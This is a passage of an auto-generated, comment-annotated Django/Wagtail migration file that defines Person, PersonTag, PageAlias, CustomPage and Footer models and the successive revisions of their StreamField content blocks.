('menu_order', models.IntegerField(blank=True, default=1, help_text='The order this page should appear in the menu. The lower the number, the more left the page will appear. This is required for all pages where "Show in menus" is checked.')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
# Person: a plain model (NOT a Wagtail page — bases are models.Model plus
# wagtailsearch's Indexed mixin, so instances are indexed for Wagtail search).
# Holds profile data: name parts, bio, role ('title'/'position'/'term'),
# contact/social links, and an optional photo (SET_NULL on image deletion).
# Ordered by last_name; admin plural is 'People'.
migrations.CreateModel(
name='Person',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=255)),
('middle_name', models.CharField(blank=True, max_length=255, null=True)),
('last_name', models.CharField(max_length=255)),
('bio', wagtail.wagtailcore.fields.RichTextField(blank=True)),
('title', models.CharField(blank=True, max_length=140)),
('position', models.CharField(blank=True, max_length=140)),
('term', models.CharField(blank=True, help_text='Format:YYYY-YYYY', max_length=9)),
('linked_in', models.URLField(blank=True)),
('blog_url', models.URLField(blank=True)),
('osf_profile', models.URLField(blank=True)),
('phone_number', models.CharField(blank=True, help_text='Format:XXX-XXX-XXXX', max_length=12)),
('email_address', models.EmailField(blank=True, max_length=254)),
('favorite_food', models.CharField(blank=True, max_length=140)),
('photo', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='wagtailimages.Image')),
],
options={
'verbose_name_plural': 'People',
'ordering': ['last_name'],
},
bases=(models.Model, wagtail.wagtailsearch.index.Indexed),
),
# PersonTag: the custom through model joining Person to taggit.Tag.
# 'content_object' is a modelcluster ParentalKey so tags can be edited
# together with the parent Person in Wagtail's admin.
migrations.CreateModel(
name='PersonTag',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content_object', modelcluster.fields.ParentalKey(on_delete=django.db.models.deletion.CASCADE, related_name='tagged_person', to='common.Person')),
('tag', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='common_persontag_items', to='taggit.Tag')),
],
options={
'abstract': False,
},
),
# Attach the taggit manager to Person, routed through the PersonTag
# through-model created above.
migrations.AddField(
model_name='person',
name='tags',
field=taggit.managers.TaggableManager(blank=True, help_text='A comma-separated list of tags.', through='common.PersonTag', to='taggit.Tag', verbose_name='Tags'),
),
# Optionally link a Person to a Django auth user; reverse accessor is
# user.profile. CASCADE: deleting the user deletes the linked Person row.
migrations.AddField(
model_name='person',
name='user',
field=models.OneToOneField(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='profile', to=settings.AUTH_USER_MODEL),
),
# Give CustomPage an optional footer FK (defaults to footer pk=1; nulls out
# if the Footer is deleted).
migrations.AddField(
model_name='custompage',
name='footer',
field=models.ForeignKey(blank=True, default=1, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to='common.Footer'),
),
# Redefine CustomPage.content's StreamField block list (auto-generated; the
# whole definition is restated on every change). This revision includes
# 'tab_index' and an id/isActive-based 'tabcontainerblock' among the blocks.
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tab_index', wagtail.wagtailcore.blocks.StructBlock((('display_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'vertical'), ('horizontal', 'horizontal')])), ('tabsIndexes', wagtail.wagtailcore.blocks.StreamBlock((('tab', wagtail.wagtailcore.blocks.StructBlock((('id', wagtail.wagtailcore.blocks.TextBlock(max_length=25, required=True)), ('display', wagtail.wagtailcore.blocks.TextBlock(max_length=40, required=True))))),)))))), ('tabcontainerblock', wagtail.wagtailcore.blocks.StructBlock((('tabs', wagtail.wagtailcore.blocks.StreamBlock((('tab', wagtail.wagtailcore.blocks.StructBlock((('id', wagtail.wagtailcore.blocks.CharBlock(required=True)), ('isActive', wagtail.wagtailcore.blocks.BooleanBlock(default=False, required=False)), ('container', wagtail.wagtailcore.blocks.StreamBlock((('two_column_block', common.blocks.columns.RowBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), 
('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))))))))),))),))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('clear_fixblock', 
wagtail.wagtailcore.blocks.StructBlock(()))), blank=True, null=True),
),
# Redefine Footer.content's StreamField; this revision names the row block
# 'threecolumn' (renamed to 'columns' by the very next operation).
migrations.AlterField(
model_name='footer',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('threecolumn', common.blocks.columns.RowBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('google_map', wagtail.wagtailcore.blocks.StructBlock((('address', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('map_zoom_level', wagtail.wagtailcore.blocks.CharBlock(default=14, max_length=3, required=True))))), ('twitter_feed', wagtail.wagtailcore.blocks.StructBlock((('username', wagtail.wagtailcore.blocks.CharBlock(required=True)),))), ('photo_stream', wagtail.wagtailcore.blocks.StructBlock(())), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),)))), blank=True, null=True),
),
# Redefine Footer.content again: identical to the previous definition except
# the row block is renamed from 'threecolumn' to 'columns'.
migrations.AlterField(
model_name='footer',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('columns', common.blocks.columns.RowBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('google_map', wagtail.wagtailcore.blocks.StructBlock((('address', wagtail.wagtailcore.blocks.CharBlock(max_length=255, required=True)), ('map_zoom_level', wagtail.wagtailcore.blocks.CharBlock(default=14, max_length=3, required=True))))), ('twitter_feed', wagtail.wagtailcore.blocks.StructBlock((('username', wagtail.wagtailcore.blocks.CharBlock(required=True)),))), ('photo_stream', wagtail.wagtailcore.blocks.StructBlock(())), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),)))), blank=True, null=True),
),
# Redefine CustomPage.content: 'tabcontainerblock' now nests tabs as
# tab_name/tab_content (tab_content itself is a StreamBlock of sub-blocks)
# instead of the earlier id/isActive/container shape.
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tab_index', wagtail.wagtailcore.blocks.StructBlock((('display_style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('vertical', 'vertical'), ('horizontal', 'horizontal')])), ('tabsIndexes', wagtail.wagtailcore.blocks.StreamBlock((('tab', wagtail.wagtailcore.blocks.StructBlock((('id', wagtail.wagtailcore.blocks.TextBlock(max_length=25, required=True)), ('display', wagtail.wagtailcore.blocks.TextBlock(max_length=40, required=True))))),)))))), ('tabcontainerblock', wagtail.wagtailcore.blocks.StructBlock((('tabs', wagtail.wagtailcore.blocks.StreamBlock((('tab', wagtail.wagtailcore.blocks.StructBlock((('tab_name', wagtail.wagtailcore.blocks.CharBlock()), ('tab_content', wagtail.wagtailcore.blocks.StreamBlock((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', 
wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('paragraph', wagtail.wagtailcore.blocks.TextBlock()), ('customizedimage', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()))))))),))),))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(()))), blank=True, null=True),
),
# Redefine CustomPage.content: the hand-rolled 'tab_index' StructBlock is
# replaced by 'tabbed_block' (common.blocks.tabs.TabListBlock).
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabbed_block', common.blocks.tabs.TabListBlock()), ('tabcontainerblock', wagtail.wagtailcore.blocks.StructBlock((('tabs', wagtail.wagtailcore.blocks.StreamBlock((('tab', wagtail.wagtailcore.blocks.StructBlock((('tab_name', wagtail.wagtailcore.blocks.CharBlock()), ('tab_content', wagtail.wagtailcore.blocks.StreamBlock((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('paragraph', wagtail.wagtailcore.blocks.TextBlock()), ('customizedimage', 
wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()))))))),))),))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(()))), blank=True, null=True),
),
# Redefine CustomPage.content: inside 'tabcontainerblock' the tab child
# fields are renamed tab_name/tab_content -> name/content.
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabbed_block', common.blocks.tabs.TabListBlock()), ('tabcontainerblock', wagtail.wagtailcore.blocks.StructBlock((('tabs', wagtail.wagtailcore.blocks.StreamBlock((('tab', wagtail.wagtailcore.blocks.StructBlock((('name', wagtail.wagtailcore.blocks.CharBlock()), ('content', wagtail.wagtailcore.blocks.StreamBlock((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('paragraph', wagtail.wagtailcore.blocks.TextBlock()), ('customizedimage', 
wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()))))))),))),))), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(()))), blank=True, null=True),
),
# PageAlias: a Wagtail page that points at another page ('alias_for_page',
# reverse accessor page.aliases; SET_NULL if the target is deleted) so the
# same page can presumably appear in multiple menu positions — confirm
# against the model's serve logic.
migrations.CreateModel(
name='PageAlias',
fields=[
('page_ptr', models.OneToOneField(auto_created=True, on_delete=django.db.models.deletion.CASCADE, parent_link=True, primary_key=True, serialize=False, to='wagtailcore.Page')),
('alias_for_page', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='aliases', to='wagtailcore.Page')),
('menu_order', models.IntegerField(blank=True, default=1, help_text='The order this page should appear in the menu. The lower the number, the more left the page will appear. This is required for all pages where "Show in menus" is checked.')),
],
options={
'abstract': False,
},
bases=('wagtailcore.page',),
),
# Add an optional custom_url slot to CustomPage (note: unlike NewsArticle's
# custom_url above, this one is nullable as well as blank).
migrations.AddField(
model_name='custompage',
name='custom_url',
field=models.CharField(blank=True, default='', max_length=256, null=True),
),
# Redefine CustomPage.content: the inline 'tabcontainerblock' StructBlock is
# dropped entirely, leaving 'tabbed_block' (TabListBlock) as the tab block.
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabbed_block', common.blocks.tabs.TabListBlock()), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', wagtail.wagtailcore.blocks.CharBlock(max_length=20))))), ('centered_text', wagtail.wagtailcore.blocks.StructBlock((('text', wagtail.wagtailcore.blocks.RichTextBlock()),))), ('hero_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock(required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))), ('spotlight_block', wagtail.wagtailcore.blocks.StructBlock((('bubbles', wagtail.wagtailcore.blocks.StreamBlock((('bubble_block', wagtail.wagtailcore.blocks.StructBlock((('image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('title', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('description', wagtail.wagtailcore.blocks.RichTextBlock(required=True))))),))),))), ('job_whole_block', wagtail.wagtailcore.blocks.StructBlock(())), ('embed_block', wagtail.wagtailembeds.blocks.EmbedBlock()), ('clear_fixblock', wagtail.wagtailcore.blocks.StructBlock(()))), blank=True, null=True),
),
# BlogTag: a proxy over taggit.Tag (no fields, no table of its own).
# Immediately deleted by the next operation, so the pair is a historical
# no-op preserved in the squashed migration state.
migrations.CreateModel(
name='BlogTag',
fields=[
],
options={
'proxy': True,
},
bases=('taggit.tag',),
),
# Remove the BlogTag proxy created just above (state-only change — a proxy
# model has no table to drop).
migrations.DeleteModel(
name='BlogTag',
),
# Redefine CustomPage.content: adds a top-level 'rich_text' block alongside
# the existing 'paragraph' RichTextBlock.
migrations.AlterField(
model_name='custompage',
name='content',
field=wagtail.wagtailcore.fields.StreamField((('appeal', wagtail.wagtailcore.blocks.StructBlock((('icon', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('none', 'none'), ('flask', 'flask'), ('group', 'group'), ('laptop', 'laptop'), ('sitemap', 'sitemap'), ('user', 'user'), ('book', 'book'), ('download', 'download')])), ('topic', wagtail.wagtailcore.blocks.CharBlock(max_length=35, required=True)), ('content', wagtail.wagtailcore.blocks.TextBlock(max_length=255, required=True))), classname='appeal', icon='tick', template='common/blocks/appeal.html')), ('heading', wagtail.wagtailcore.blocks.CharBlock(classname='full title')), ('statement', wagtail.wagtailcore.blocks.CharBlock()), ('paragraph', wagtail.wagtailcore.blocks.RichTextBlock()), ('imagechooser', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('column', common.blocks.columns.RowBlock()), ('tabbed_block', common.blocks.tabs.TabListBlock()), ('image', wagtail.wagtailcore.blocks.StructBlock((('main_image', wagtail.wagtailimages.blocks.ImageChooserBlock()), ('style', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('max-width:225px;max-height:145px', 'small display'), ('max_width:250px;max-height:250px', 'middle display'), ('max_width:250px;max-height:250px;padding-top:20px', 'middle + padding display'), ('height:auto', 'auto display')], default='height:auto')), ('url', wagtail.wagtailcore.blocks.CharBlock(max_length=250, required=False))))), ('rich_text', wagtail.wagtailcore.blocks.RichTextBlock()), ('raw_html', wagtail.wagtailcore.blocks.RawHTMLBlock(help_text='With great power comes great responsibility. This HTML is unescaped. Be careful!')), ('people_block', wagtail.wagtailcore.blocks.StructBlock((('displayStyle', wagtail.wagtailcore.blocks.ChoiceBlock(choices=[('concise-team', 'concise-team'), ('concise-ambassador', 'concise-ambassador'), ('detailed', 'detailed')], default='concise')), ('tag', 